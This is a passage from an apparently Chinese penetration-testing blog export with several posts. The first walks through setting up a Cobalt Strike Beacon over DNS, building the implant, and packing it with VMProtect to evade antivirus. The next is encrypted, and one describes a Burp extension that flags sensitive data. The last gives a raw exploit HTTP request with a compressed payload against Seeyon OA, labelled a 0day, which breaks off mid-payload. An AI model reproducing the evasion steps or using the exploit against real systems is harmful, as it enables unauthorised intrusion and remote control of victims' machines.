<p><a href="https://mp.weixin.qq.com/s/sd73eL3-TnMm0zWLCC8cOQ" target="_blank" rel="noopener">https://mp.weixin.qq.com/s/sd73eL3-TnMm0zWLCC8cOQ</a></p>
<p><a href="https://docs.python.org/zh-cn/dev/library/pickle.html" target="_blank" rel="noopener">https://docs.python.org/zh-cn/dev/library/pickle.html</a></p>
<p><a href="https://zhuanlan.zhihu.com/p/148696337" target="_blank" rel="noopener">https://zhuanlan.zhihu.com/p/148696337</a></p>
]]></content>
<tags>
<tag>Python</tag>
</tags>
</entry>
<entry>
<title>Cobaltstrike Beacon DNS上线</title>
<url>/2020/12/02/Cobaltstrike-Beacon-DNS%E4%B8%8A%E7%BA%BF/</url>
<content><![CDATA[<h4 id="写在前面"><a href="#写在前面" class="headerlink" title="写在前面"></a>写在前面</h4><p>因为最近捣鼓了一下Cobaltstrike DNS上线,发现网上文章大多数千篇一律(复制粘贴),形成很多误导。</p>
<h4 id="环境介绍"><a href="#环境介绍" class="headerlink" title="环境介绍"></a>环境介绍</h4><figure class="highlight angelscript"><table><tr><td class="code"><pre><span class="line">域名平台:阿里云</span><br><span class="line">CobaltStrike版本:<span class="number">4.1</span></span><br></pre></td></tr></table></figure>
<h4 id="环境配置"><a href="#环境配置" class="headerlink" title="环境配置"></a>环境配置</h4><h5 id="域名配置"><a href="#域名配置" class="headerlink" title="域名配置"></a>域名配置</h5><a id="more"></a>
<figure class="highlight dns"><table><tr><td class="code"><pre><span class="line">添加一条<span class="keyword">A</span>记录指向服务端地址,然后添加两条(可一条)<span class="keyword">NS</span>记录指向<span class="keyword">A</span>记录</span><br></pre></td></tr></table></figure>
<p><img src="/img/Cobaltstrike-Beacon-DNS%E4%B8%8A%E7%BA%BF/image-20201201125358965.png" alt="image-20201201125358965"></p>
<h5 id="Listener-配置"><a href="#Listener-配置" class="headerlink" title="Listener 配置"></a>Listener 配置</h5><figure class="highlight routeros"><table><tr><td class="code"><pre><span class="line">Name: 自定义</span><br><span class="line">Payload: Beacon DNS</span><br><span class="line">DNS Hosts: 域名的NS记录(一个以上)</span><br><span class="line">DNS Hosts(Stager):<span class="built_in"> DNS </span>Hosts的中的一个(只有一个的情况就写一样的)</span><br><span class="line">DNS Port(Bind): 空</span><br></pre></td></tr></table></figure>
<p><img src="/img/Cobaltstrike-Beacon-DNS%E4%B8%8A%E7%BA%BF/image-20201201144725118.png" alt="image-20201201144725118"></p>
<h5 id="环境检测"><a href="#环境检测" class="headerlink" title="环境检测"></a>环境检测</h5><figure class="highlight angelscript"><table><tr><td class="code"><pre><span class="line">nslookup ns记录</span><br><span class="line">默认情况下看是否返回<span class="number">0.0</span><span class="number">.0</span><span class="number">.0</span>,返回则表示成功。(可通过profile来更改的,其进行流量隐藏等,具体可见参考)</span><br></pre></td></tr></table></figure>
<p><img src="/img/Cobaltstrike-Beacon-DNS%E4%B8%8A%E7%BA%BF/image-20201201130948405.png" alt="image-20201201130948405"></p>
<h4 id="生成木马"><a href="#生成木马" class="headerlink" title="生成木马"></a>生成木马</h4><p>这里生成一种进行演示,可自行尝试其他方式。</p>
<p><img src="/img/Cobaltstrike-Beacon-DNS%E4%B8%8A%E7%BA%BF/image-20201201132840569.png" alt="image-20201201132840569"></p>
<p><img src="/img/Cobaltstrike-Beacon-DNS%E4%B8%8A%E7%BA%BF/image-20201201133135684.png" alt="image-20201201133135684"></p>
<h4 id="上线"><a href="#上线" class="headerlink" title="上线"></a>上线</h4><p>目标靶机执行生成的木马文件</p>
<p><img src="/img/Cobaltstrike-Beacon-DNS%E4%B8%8A%E7%BA%BF/image-20201201133647578.png" alt="image-20201201133647578"></p>
<figure class="highlight dns"><table><tr><td class="code"><pre><span class="line">出现小黑电脑右键->Interact</span><br><span class="line">输入命令</span><br><span class="line">checkin #强制回连</span><br><span class="line">注:很多文章需输入mode dns-txt (默认就为dns-txt模式)</span><br><span class="line">根据官方文档描述,CS4中有三种数据传输模式,<span class="keyword">A</span>、<span class="keyword">AAAA</span>、<span class="keyword">TXT</span>,默认是<span class="keyword">TXT</span></span><br></pre></td></tr></table></figure>
<p>显示蓝色电脑如图则成功上线</p>
<p><img src="/img/Cobaltstrike-Beacon-DNS%E4%B8%8A%E7%BA%BF/image-20201201133927679.png" alt="image-20201201133927679"></p>
<p>执行whoami</p>
<p><img src="/img/Cobaltstrike-Beacon-DNS%E4%B8%8A%E7%BA%BF/image-20201201135019135.png" alt="image-20201201135019135"></p>
<h4 id="免杀"><a href="#免杀" class="headerlink" title="免杀"></a>免杀</h4><p>这里演示一下加壳免杀过某绒。</p>
<p>免杀前,生成的文件直接给某绒自动处理了。</p>
<p><img src="/img/Cobaltstrike-Beacon-DNS%E4%B8%8A%E7%BA%BF/image-20201201143243313.png" alt="image-20201201143243313"></p>
<p>进行VMP加壳处理</p>
<p><img src="/img/Cobaltstrike-Beacon-DNS%E4%B8%8A%E7%BA%BF/image-20201201143432147.png" alt="image-20201201143432147"></p>
<p>进行检测</p>
<p><img src="/img/Cobaltstrike-Beacon-DNS%E4%B8%8A%E7%BA%BF/image-20201201144944327.png" alt="image-20201201144944327"></p>
<p>测试</p>
<p><img src="/img/Cobaltstrike-Beacon-DNS%E4%B8%8A%E7%BA%BF/image-20201201154931556.png" alt="image-20201201154931556"></p>
<h4 id="参考"><a href="#参考" class="headerlink" title="参考"></a>参考</h4><p><a href="https://xz.aliyun.com/t/7938" target="_blank" rel="noopener">https://xz.aliyun.com/t/7938</a></p>
<p><a href="https://www.nctry.com/1655.html" target="_blank" rel="noopener">https://www.nctry.com/1655.html</a></p>
<p><a href="https://choge.top/2020/08/16/Cobaltstrike%E4%B9%8B%E6%B5%81%E9%87%8F%E9%9A%90%E8%97%8F/" target="_blank" rel="noopener">https://choge.top/2020/08/16/Cobaltstrike%E4%B9%8B%E6%B5%81%E9%87%8F%E9%9A%90%E8%97%8F/</a></p>
]]></content>
<tags>
<tag>Cobaltstrike</tag>
</tags>
</entry>
<entry>
<title>某SRC任意文件包含漏洞 包含日志Getshell</title>
<url>/2020/10/20/%E6%9F%90SRC%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E6%BC%8F%E6%B4%9E-%E5%8C%85%E5%90%AB%E6%97%A5%E5%BF%97Getshell/</url>
<content><![CDATA[<div id="hexo-blog-encrypt" data-wpm="密码不正确,请重新输入!" data-whm="文章不能被校验, 不过您还是能看看解密后的内容!">
<div class="hbe-input-container">
<input type="password" id="hbePass" placeholder="" />
<label for="hbePass">该文章已加密, 请输入密码查看。</label>
<div class="bottom-line"></div>
</div>
<script id="hbeData" type="hbeData" data-hmacdigest="c81eda7ff55877f1cad0bf7df46f730520ee4ac93067774dc51d8bdc27d071be">ee630012bddc00c61ef0585c52f9079d7a967d5982e5276e29c833b46e079e922c8a03b936ebbfb0745aade7bf3b83d5984745f1ff276676a63392e01c61d23a2237cde55072fd2d70f0a2d771f75a7088f2f2e600fddc0f7b381bf0931f4a206dc7933ec66fdb4217f6ecf50176bed6abf59f119d727c0864de1aa59a53edac804ad8521115615c1770b3452d3f0cfc3b17193dd2b3593c3b0d02cadb44eb74edba3c4edbe16a113e4d1441cc49a274b6542f668986e7479afb59127faf9a699aeb08fe60525d3ca6cbf2ab7ef35c8e7f9e98e1bc6ddcf08523e560881f74a58bfbfb3d66c98e2f129f9036e94b9450bbc84d390069a9665058648337c9617cf908d362cfbe631b1a5672417583d31f25e3ca4c867853928f1b593a1936050e55fec5a0bc7579424a42b008c354590cd5fc39d78ff5f18ec2df264e28be302afd68572e2b56d867d618a6e2a8b01d4adb7d9f90df06fb230eb7310aed06be73995b156fe4b5ed892df823f258b9904148b9453f53c8241f9b336787df49293e0dd261b194d777b018eb0f0c5ad41984495dd89e7f41a16f58a8b36e78f23f775855f8ca55f5db947902a20badbe8bfc2aedf9ea07090639aee7d969abdc6a90e38d10740162b219cb893c095b6b338dc604a64f1d7d75bc44567887317ecf8cf2e4ecf5280a8d0ea68f4066523d6a376ad6ff93d327ab8de0b2d9b06f84ea515da9edfb8312c8ff3356134a90f1909737ca191da28cd3ceda7c4b156e4bd3a2ba541d1c42d31d01015c5fdc5208a5ed56ad7dda3bf8928d8c7b4f9dad0085568435c92a28f0c701ce1778876b5d1aa89d829b74d156cdad26a38df57ea024de8ed59c175370203457a7933c5e92b02b21a4e054e255f7a4d5aad5290831db1d11dab6376ef730aa56ccb141cf1237fd7d702c03e97a06fcf3249a94c5c65339dc4d2b8985e16fb44acff88edf442f3b05833191456c95bcbd81b881f027609129650fc372e198ece31bc501de7717a115cefb3384fa39c0e24e6dc75b1a42754913eb5ed93f60dcd501d1eeeb5b98b546c75ae14dce97008c9efdb1f66fb429571123cc9e1ad1f7624046d6ac644ec802a31f89520d18c1f6bfcfe234f4051e6fa613ddb18287e1e6b98916e170836c3d3af59ad6ed0bc060876d7e92b2b361b73a06b77743090daeda9986bdd55586172d7cedde204ec8fde80e24ed54511d8750d77ce972031aed343e9c797000b1077197fc089b3108e69b190eec78ddec6c0f9df621a493503c08de04272f1e5fd5a24125827996de92d7dd99c0f391667b54b9083c1cee0bcc8448c94c43f3d38bd3a9ad702290ffca408bde62fc05052b5e10cb23a8a6c7b9625cb67c2d25550f05dc945ecc47f49703c23ddaa153bf93e25a69f8588cbb9836fe179f95171dd19fd62edb80cee91f5f3f9f32b048ed16e0af944a56af9a8e4f884bb674c4f41e8918de8084de6b76baa09dbfa3d435f44eef5307dc5077ad13290e2c81b8165d3adaa046fa20dca3966ef902472dfdc8f3effd82fe83259de487bb9ed4fb02f22763af8bdfa6fc972af93f1fef7625df86c03da0e07e501ecfe0ad81e4893506513869fd627d105f2ea89cb2de6f881dd3a542f3edd04c53db5fbc24a5b02a3e38bea3c95df44168211303fd212f86c6c5d937d5d21dcc45e274f7bd89b3c393882649166bb85234cea6b727cf045286781feeaae13d214fce71b4dcc51d0bb49302d5a2122c51eb5836c7b1dddb25c2bda06c07729a1d3c9f65961e3d27ccf0c3bd86276637c6c6fc2dc483f5ada9861b433c000f6edf3280cc0b547a7b52f2db47019a7dfbdc33be0ff7415915c7766ea13f7a9d1a9a46eb9a94df289fee5c4191ca95b63aa04246093b55289e454ccf9db74e365b6313e5b5234d5d0f31fe85c5354d8f2b71f7957ac2c3ef53e1bc620b3ca0e168ed2e7cc2c8b883ca4b227aa3fd38a33b5467f107cb078e21147a9cce2646173cfe2b1e49302d7abc369fe72195d5082c6a2a5fa6a4870328e9147459264754b23ddba7195d5b8d33e706553fa53a38bc59a713c79728232129c7fd0aa62a48bb004034aa7f62bef1615c87f3e515d1e6f94c3edb0acd4a9a0d1b54f91c5ede5d9c379494c942f93259699ae80f005c27e409ceea57683490ba97d38ab90c946cac360b2e2059a4b89e66cec106b6acb369c8bb1b3c4f22e137f17fde1e87ae8791b66d981652129a712e60eee35f8981a9f082f4b27a70df8271c20e6b15919f483c99cd3f0b021926345c0656c5e74d71074423046211b6bb9b04c879633a0367e312242d60ee6ccd3f4d08e36ca16900828bdbe2c5a62e9be1ba7f12294e5903b83928e26d48d09958354982b862c7f8103e628bb9639d46c979d3c02bec70531e11f9c1058ea8d408e53ff125774b45e2e65c74f247783f3785915b5b893590734f22b2b1ad400407c3f5090649725eb27fb7b365a802b4d8ae31a251940201541afe8630db8d1e4fbfb46b42fb7f04cb2be0974aacbc7cd5ddd1490b7fb1c0f34c2b8a5656e90cceaa1ea8b4ab40c4a3531a7bf72f12f7b9e4c42e21c99e02ffa72a7a3842a62f5adf954dd5f29ec516c09874a3d6acc1293c99475fe8cf73d38b6c973fd3b077eca153fa946d3f1aed0392815a048986533802626f646b0d3955c29a84a2c1693b90889ddc4b45ac9b28b0360618a85b4aecfc6b0c071a1c4e708f565de3d3a44491d069933e67a4417dd6e6c20b361789200da5685b46b49cdf7cb43aee13ddaa33d68671e5c8d3a87c29a0374e65ee1a8eaa2d00ed942e17ccb96503c575ca5a6441590833bc589822296c47237edf952486e1276c35739f8d733419829b49aea08a374754c8c24fc619671f99e2d262fd2f6a2d4d7330a77747c2415d5f416335afc8a4975fea38737960c94c99c0a6c9be5d28783aab600787357ee4f35fed7ca4a388b9112dafb98a73b90665bddab16a464b2b21955830cd5c2b7b840711a25531d0a8415a2d56b444d4307992a11c9ba3ec2843a9d3170b1fab1a90dd62c3db7e700907e4e7bd2feb914593ca4038bf280efae407fa27d0820752f6a76312b1f4d98133a3cd5010b15c36e6df366fed2afd933ea4d750eab9e347172d581c8a7a847686d09038c4c5008476b3b19c5bbc39fd43eda8f35d7b99a8f2405a88fd7379c5fb60efc9ffb113bfcd1bce43fe9cf5ce94f85e48966ba506a27fccf8277413e2176e4532f93bf47d85846a5c77cb530ae1cda33775aa5f7f350ed542b9f93c058b24d10da6a048d961d9f8583fc701517b81dcc26c8d866930ccbee470a48c2ca236461226c5a3a1522c65bdd63507bb11d9e8418f477d254e0f79ee747418f8287297bb5fc0128b233d152b4dfc7186f5d31042b3161e1dca5c3c7af16be2d9ce7057ab0f9ba907a9d74e5fb2df86bcf6257219b63454fd57051a567639dc6d52a9e1a42ae5b74d29a51475e59c73d6fd3a1604e079a31d9d32c64d96c61d4858ad5e4e88f31d86ea7be021ed2360fba52470d13cf047d32de8479cdac56e1f896705aa6ea4b45be4d412144d5f7052a82dc3567798c7af7f305764e35b6415b89cee6ed4ceb7d2b171a984b47c1a313ac66d069d05111fcdd2b97c904a3334010b84b07eae9169cf3cf2157991463c98f438c2a0369132ae11287afa3ade566e9bfc8098163c096196606ad3c343f868139705920eec38ac3869f6911bc37353e7761dbc61f50c7e8e0ca6ee2f4c30222bc9e9847c115d2c06aaec95a2407bc18845a51f4ea81ea46acd48f0c34b614e0b09bf018ccd58e5d5008fe27e771e4bec9a6ff6f2b1924e5ba573db3594c66aaf7ae3d090f58c5634f25e497d5ee3f9a73e3724b7c907b376e2464886ef9bf6fa84b6e7b1d7893db8640b1b8957732b2179bef1c846c6ba8a5991fc7a7ccc3e4ef4d54c6cc40dc6ddbdcc4796fcfb73a64d07d931eb068dce6e6f82071b9c31ae95ead9a9bdb1f456a37d4467925a85282c17c94b02773e56c53461c0ada9a2131c1fecd126d689383f181c4f2b366878c5eabdeb751b5ff89c21937378161f0331e1133a782894662d5f9bf4252fa362fafad6d3ea399bcd4a4a9118d243b0876064c29fc865f2f9fd70ef5b78bdad6cb29e1cfdb03c113e44e12c2ee79eb13cda4564cab851def6de16605c9119f97acc6c7243651dc073db0a1be90df698a895c960d50ca7d28b80efbb627caa137a6902715bf3e0f3a1ff72849d45c419c9f76228cf1aa963d33317037da97097245ac9a2963e2b9f25354d6614ce815dbb0309536398dc5eb544845be110fe57f778f56c46a3e81bcd40eacf04a0bb36d5f5744800f0e8deb7026ba5c03e1ba24dfba8a5a57d11ef95a613e37e861426e5b02da3a03277e11b19bc217bbedf73f1d4a8e8d49f0013e3dfaf58250e5f7151d26b9e8e161ae2537a3d2e235ad59787c2adcbddd6bf494af28606ea29f1788ecb183fd66ebf305449514093650e18a872ea8bb81818678782d7483adf978fa033f69f3817407dcd50a2ae5cf506bbb50f375eadda2a921988a8ad2396675f6f473e2fbc3b95f96f91aa91a0d693e6f4ea77348537b7cd25a4f5c4b6bb9d015b28d64100348b1ae523cf8529ae0213d9dd02cdb38fa07b5f2daf1c0bc1031d762b4a4196f59637cc5e4ae9f305760ad856d8492f84f4263eeb636f5967130dd760f38d962a8054ecdf80c6ed9a11a8d3c4ae7204e86351e0f3c0e14d9a092822098cc35b12f88594d765e0e3724a2c34114cff914f9a65998510188019766e1fbc85e0eab4916dadad53533736332cf2a653a61cd9242f0bd245d0f6084b45171100d44a8c67773f690271b29ed51ed38cc89ca03e7e95de144433c8883cdf1f1b6f66890a0f5dacc48da4b03e3fa149071a37e5e483cc735ce15b32a9271f6cc869c8cdec5779bd96df97bedbfc5c8d6c494e670af6cde569ce36da5dc1f68aff873424d89fbf6f5c84302004e5295cd88ff3c593377ca4fd2af31d6615502a792c93ca4a2118933d55c7ba4c6e74edb60853f1cdcd41aee0504db299136ea425e5bedbe1213e0856635856bcd999fd326d4f48e231d18d32164a78ab3045c376a678df948a35e8ecbd6b7bea128386fca1f8f60dbcd7f4faa9316d1ca542aed46d063767cca24dd1621b2b467f393fbaeda4d655ba2c16ea1756624ca270aa801145cd684b0004c2ede5f2855980ec65ac4d5e8e94c53ec0cee377ac2cbbe147f0a3f3e93988f79bf79840831db4b48be3da30865880774028f30afe2437e526b8475c5d8820043aaaa0baa3f333d591a00d84ee8526efc25f18568bf837dfc6dbdf1ed7f1746ea1f1d3f88b6427212ba5f885d42a53a8b4d350cfdfae7bd228aaaed85526fbfec7eaa46424e9b0f152e621ce3d915a8b06b1357a4462222c28f70418b0677af516384be2ecf12117b086f79f91bf03ef37576da1d3569de5b5818add037d63e59b48655f9987efe7519afb56494910e3702d5d5c2264f2ce17b3252086bbe5d6dc6a833ca13bc4729b1235707f372628ea90d680c4c731409c447ae4393af3ec342928b53412f7fe0667a0d19e1bf0ba4850f028e500efe6d0fe0e976e2e3ffd72b3e304e6975349b93523c681ab2de58dc6b14f22a8602c8af451375119d950beb1d708abdc7e129b6686e43e8bcd369ed053e02f592473b7d28aa17d74574231e4bbc612311f453d75cc19341912fa63531e71417eecc53383521cba46b972e5409e0320ba6ba65a06d52f9c901c1298381f9867273dc5eb5bc989cdbd56c28f5540db293934d781084bd95027c099f8b49e622db141fc6b331f3e6dd7f5bc8e3ac1dc1131a532bd9a5fb8d18bb37f2394d6120158175e999f086508e423263b264d290064842589c4791f2cd00a4234e8dae8425a00143c1b337dbb8407e820aa83fdf7be923b1d9da56064b52f663827a83fdfae290c45a7819b5d2392c14a52db737452976de888a073626e91cd5e0affb5f7d6ac994a6af5eb1f1cedafac50e74ed315a7a9f27d45c1cec94becc8af75c1b3ea2574f94ffd9dd7a9083698e292a4ad928a227081b31a3fa44420007062731dace185d24e09aad9a98381855325a88447b8e14fe068014723d4523b3c6edfccdf9a43db9ce93f0cd140b6cb0f0dee6747f1325c4d877b995da6fd4b1d58d61be44da164a7134c4fce122b78a13524125ae3841f2d7a2eec3734d393c490a4cfdd8f82145664d312ec3d71fe2e66d8b1f02c3c1fdb9992cdb465dc06b1cb8c99e60dbdce7eca0eb350e2d40517175880cfb91c1fa5c61835cd948ad12e550e828d132f116baabcb7d26b24db7b190bdd1f99bf3ae3a38e2169f26a2cf53096c59225e17cee5a8d967b6d270b0f5b87db0d9836e151636cca0e32c3e1e3fd6a5ab9ee10d9f5223c9a445b236685d644bf8d829153b121573a8e9831f30baf7e15b8896ef6d0ea666ff87e002e6e9edf26c8764cb87afc271166e87a1c395cdb4114f6332a4deaa0e1f78ef16a8a3caca4ffea4b6d71c1996191d23da130703f93f502a452e783eaced11d1762e5cfbb2aecd3bc307c6c9a8132b2b323dea3a655fe2da7db919c8fa411ea44adcdb8d409da0e6d4a14cfd6b99e4806</script>
</div>
<script src="/lib/blog-encrypt.js"></script><link href="/css/blog-encrypt.css" rel="stylesheet" type="text/css">]]></content>
<tags>
<tag>ThinkCMF</tag>
</tags>
</entry>
<entry>
<title>BurpSuite-Extender-Unexpected information</title>
<url>/2020/09/28/Unexpected_information_BurpSuite_Extensions/</url>
<content><![CDATA[<p>最近写了一个BurpSuite Extensions用来标记请求包中的一些敏感信息、JS接口和一些特殊字段,防止我们疏忽了一些数据包,我将它命名为“Unexpected information”,使用它可能会有意外的收获信息。</p>
<a id="more"></a>
<h4 id="介绍"><a href="#介绍" class="headerlink" title="介绍"></a>介绍</h4><h5 id="支持列表"><a href="#支持列表" class="headerlink" title="支持列表"></a>支持列表</h5><ul>
<li><input checked="" disabled="" type="checkbox"> 身份证信息</li>
<li><input checked="" disabled="" type="checkbox"> 手机号信息</li>
<li><input checked="" disabled="" type="checkbox"> IP信息</li>
<li><input checked="" disabled="" type="checkbox"> 邮箱信息</li>
<li><input checked="" disabled="" type="checkbox"> JS文件API接口路径</li>
<li><input checked="" disabled="" type="checkbox"> 特殊字段(password、method: “post”…)</li>
<li><input checked="" disabled="" type="checkbox"> 双向检测</li>
<li><input checked="" disabled="" type="checkbox"> 高亮显示</li>
</ul>
<h5 id="高亮模式"><a href="#高亮模式" class="headerlink" title="高亮模式"></a>高亮模式</h5><figure class="highlight clean"><table><tr><td class="code"><pre><span class="line">邮箱 -> 黄色</span><br><span class="line">内网IP -> 红色</span><br><span class="line">手机号码 -> 绿色</span><br><span class="line">身份证号码 -> 绿色</span><br><span class="line">其他 -> 无 (只开启Unexpected information标签页)</span><br></pre></td></tr></table></figure>
<p>当如数据包中存在有相关的对应信息(如手机号码、IP地址、邮箱、身份证号码等)存在时HTTP history标签页中的对应请求中自动标记颜色高亮,并且开启一个新的标签页名为”Unexpected information”显示匹配到的信息。</p>
<h4 id="如何使用"><a href="#如何使用" class="headerlink" title="如何使用"></a>如何使用</h4><figure class="highlight mipsasm"><table><tr><td class="code"><pre><span class="line"><span class="keyword">BurpSuite </span>>> <span class="keyword">Extender </span>>> <span class="keyword">Extensions </span>>> <span class="keyword">Add </span>>> <span class="keyword">Extension </span>type: <span class="keyword">Java </span>>> Select file ...>> 选择对应的插件(Unexpected information.<span class="keyword">jar)</span></span><br><span class="line"><span class="keyword">注意:避免使用中文目录</span></span><br></pre></td></tr></table></figure>
<p><img src="https://raw.githubusercontent.com/ScriptKid-Beta/Unexpected_information/master/image-20200913144353237.png" alt="image-20200913144353237"></p>
<h4 id="效果"><a href="#效果" class="headerlink" title="效果"></a>效果</h4><p><img src="https://raw.githubusercontent.com/ScriptKid-Beta/Unexpected_information/master/image-20200913151710096.png" alt="image-20200913151710096"></p>
<p><img src="https://raw.githubusercontent.com/ScriptKid-Beta/Unexpected_information/master/image-20200913152201413.png" alt="image-20200913152201413"></p>
<h4 id="项目地址"><a href="#项目地址" class="headerlink" title="项目地址"></a>项目地址</h4><figure class="highlight awk"><table><tr><td class="code"><pre><span class="line">https:<span class="regexp">//gi</span>thub.com<span class="regexp">/ScriptKid-Beta/</span>Unexpected_information</span><br><span class="line"></span><br><span class="line"><span class="regexp">//</span> jar文件</span><br><span class="line">https:<span class="regexp">//gi</span>thub.com<span class="regexp">/ScriptKid-Beta/</span>Unexpected_information<span class="regexp">/releases</span></span><br></pre></td></tr></table></figure>
<h4 id="最后"><a href="#最后" class="headerlink" title="最后"></a>最后</h4><p>欢迎师傅Star,最重要的是如果师傅们有什么建议或者Bug,请在issues里提出来或者公众号留言。</p>
]]></content>
<tags>
<tag>JAVA</tag>
</tags>
</entry>
<entry>
<title>致远OA_0day(捕捉)</title>
<url>/2020/09/28/%E8%87%B4%E8%BF%9COA_0day(%E6%8D%95%E6%8D%89)/</url>
<content><![CDATA[<p>本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担。</p>
<div style="text-align: right"> 小维</div>
<h4 id="概述"><a href="#概述" class="headerlink" title="概述"></a>概述</h4><figure class="highlight livecodeserver"><table><tr><td class="code"><pre><span class="line"><span class="keyword">http</span> <span class="keyword">contains</span> <span class="string">"..;/"</span></span><br><span class="line"><span class="keyword">http</span>.request.uri == <span class="string">"/seeyon/SeeyonUpdate1.jspx"</span></span><br></pre></td></tr></table></figure>
<a id="more"></a>
<h4 id="payload"><a href="#payload" class="headerlink" title="payload"></a>payload</h4><figure class="highlight"><table><tr><td class="code"><pre><span class="line"><span class="keyword">POST</span> <span class="string">/seeyon/autoinstall.do.css/..;/ajax.do?method=ajaxAction&managerName=formulaManager&requestCompress=gzip</span> HTTP/1.1</span><br><span class="line"><span class="attribute">Host</span>: </span><br><span class="line"><span class="attribute">Connection</span>: close</span><br><span class="line"><span class="attribute">Cache-Control</span>: max-age=0</span><br><span class="line"><span class="attribute">Upgrade-Insecure-Requests</span>: 1</span><br><span class="line"><span class="attribute">User-Agent</span>: Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; fr) Presto/2.9.168 Version/11.52</span><br><span class="line"><span class="attribute">Accept</span>: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9</span><br><span class="line"><span class="attribute">Sec-Fetch-Site</span>: none</span><br><span class="line"><span class="attribute">Sec-Fetch-Mode</span>: navigate</span><br><span class="line"><span class="attribute">Sec-Fetch-User</span>: ?1</span><br><span class="line"><span class="attribute">Sec-Fetch-Dest</span>: document</span><br><span class="line"><span class="attribute">Accept-Encoding</span>: gzip, deflate</span><br><span class="line"><span class="attribute">Accept-Language</span>: zh-CN,zh;q=0.9</span><br><span class="line"><span class="attribute">Cookie</span>: JSESSIONID=7B6D8C106BD599DB0EF2F2E3B794A4FA; loginPageURL=; login_locale=zh_CN;</span><br><span class="line"><span class="attribute">Content-Type</span>: application/x-www-form-urlencoded</span><br><span class="line"><span class="attribute">Content-Length</span>: 8819</span><br><span class="line"></span><br><span class="line">managerMethod=validate&arguments=%1F%C2%8B%08%00%00%00%00%00%00%00uTK%C2%93%C2%A2H%10%3E%C3%AF%C3%BE%0A%C3%82%C2%8Bv%C3%B4%C2%8C%C2%8D+c%C2%BB%13%7Bh_%C2%88%28*%28%C2%AF%C2%8D%3D%40%15Ba%15%C2%B0%C3%B2%10%C3%AC%C2%98%C3%BF%C2%BE%05%C3%98%C3%93%3D%C2%B1%C2%BDu%C2%A9%C3%8C%C2%AC%C3%8C%C2%AF%C3%B2%C3%BD%C3%97k%C3%B7%14_H%C2%8E%C2%9DC%C2%95x%C3%9D%3F%C2%98%C3%81%17%C3%A6M%C2%A28%C2%A4%C2%96t3%2F%C3%8D%C2%BA%C3%AF%C3%A2y%C2%99%5C%C2%BC4EqT%3Fj%C3%99%05E%3E%C2%938Y%C3%80%C3%BC%C3%89t%C3%BA%C3%BD%C2%A7%C2%AB%C3%A7%3AI%C2%92%3E%C2%A5%C2%9EW%C3%85%C3%91S%C3%A7%C3%BB%C3%AFL%7B%7E%0B%C2%9D%C3%82%C3%A9%C2%A3%C2%B8%C2%BF%C2%A3%26%C2%99qA%C2%99wa%C2%92w%C2%9A%C2%A3%00%C2%91we%3EQ%C3%AB%C3%95%C3%B8%C2%8F%1D%C2%AD%C2%81%3C%26%C3%90%C3%89%C2%BCA%3FL%C2%93%C2%B2%C3%B3%C3%B0%13%C2%9E%C2%B9%C2%BB%C2%92%06%1E%C3%86%C2%B5%2F%3B1%C2%B9%C2%81YR%C2%B9%C3%9C%C2%98%C2%95%C2%96A%C3%A6%C2%8A%C3%82mKj%19%C2%8B%C2%9C%C2%A5%C3%8A%C2%82Y%5C%C2%AC%C2%B9%24%C2%80d%C2%9E%03%5E%C3%8F%C3%97D%29%5Cm%2C%1F%07%2F%C3%85Q%5CD%C2%B6%26%C3%B9%C2%90%C3%A8%15%C3%A0p%C3%A1%C2%86%2C%C3%9Ah%C3%83J%0A%C2%87%C3%8FN%C2%A4%5C%C2%B7DM%00%C3%91C%28b%C3%8E%C3%96%C2%84%C2%ABe%40%2C%C2%898%03%C3%A2%C2%B8%C2%825%3EYp%C2%96%26%0C%C3%A8%7B%C2%BAFq%C3%9A%C3%B0%C2%A6%C2%9F%5B%C3%BCJ%00K%C2%B5%C3%B8TFqmc%C2%93%C3%8BH*va%C3%B9%0F%C3%A0_%C2%BE%C3%99%C2%A2%1E%C2%BA%C3%A2%C2%A2%C2%B2L5q%C2%B9%C3%A1%C2%A3%24*%C2%A9e*7iq%C3%B4m3%60mC8%C2%83j2%C2%A3%3A7%C3%80%C2%96%C2%85e%C2%A8%18D%C2%99.%C3%8F%5B%C2%BD%C2%838%0E%28F%25%C2%89%C2%9B%C3%84%C3%A3%C2%95%01%C2%A0%C2%B4L%C3%A9-%3F%C2%B8Bc%C2%95%3A%C3%86%C3%86%C3%9Fse%00%C3%B8%C2%8DoW%01%C3%B2L%15K%C2%8B%0CZ%08%C2%8Fh%7C%2C4W%C2%B9%C2%B4l%C3%AD%C3%96D%C3%856%C3%81%C2%B9%7Dl%C2%B1eQJ7%C3%93%12%C2%ADI%C2%89%5D%02Ygz%1E%C2%9DL%C3%B6%C2%99%C3%A6%C2%B4%C3%8E%C3%BB%C3%996j%C2%BDU%40s%40%C3%B3w%C3%8F%5B%C2%A4%C2%84%C2%80%C3%A0%2B%14K%0Cg%C3%82%01.W%C2%89K%C2%80%C3%AF%C3%9CXd%1F%C3%B6%03%C3%BB%C2%B0%C2%A9%C2%B6%C2%86%C2%8D%C2%ADP%3Fo%0F%C3%92%C3%80B%C3%92%08p%C3%BA%C2%AD%C2%A9%01%12%C2%AE%C3%90T%0D%C3%8B%28%07%C2%B6%C3%A6%23%C2%A8I%C2%A9S%C2%9DG%7B%0E_%C2%9D6%C3%86%C3%B1%1B%C2%BD%26%10%C3%839%C2%A6uU%03%C2%97%28X%C2%9E%C2%AE%26%C2%AA%C2%BEA%C3%B2%21%0B%C3%974%06%C3%87%C3%9C%C3%87%1BT%C3%A6%C2%B6%09%C3%BC%23%C2%A7%C2%87u%C2%AC%1A%C2%A7%0BG%7E%C2%82%C2%AD%C3%8A%C2%8F%3F%C3%BC%19%C3%99%C2%BF%C3%BE%C2%99%C3%88%C2%95%C2%84d%C2%AD%C2%91O%C3%AB%7C%C2%81%C3%8AO%C3%96o%C3%B8%C3%9Ay%C3%A4%12%C2%9D%C2%A7%C3%B5%C2%89%C2%A1%18%24%C2%A0j%C3%B4%C3%9A%C3%BA%C3%94z%C2%8D_%C2%BF%C3%96F%C2%9E%C2%9E%C2%A9%1C%C3%84V%25%C2%9C%5D%C3%96%C2%A6%C3%B9X%C2%A4%C2%B2%28%60XMn%C3%90%18%C3%A6%C2%AE%C2%81o%C3%B4m%C2%BA%C3%97%C2%95%C2%85%12%C2%AAs%C2%9A%C3%97%C3%A2n%C2%977%C3%BD%C3%81%C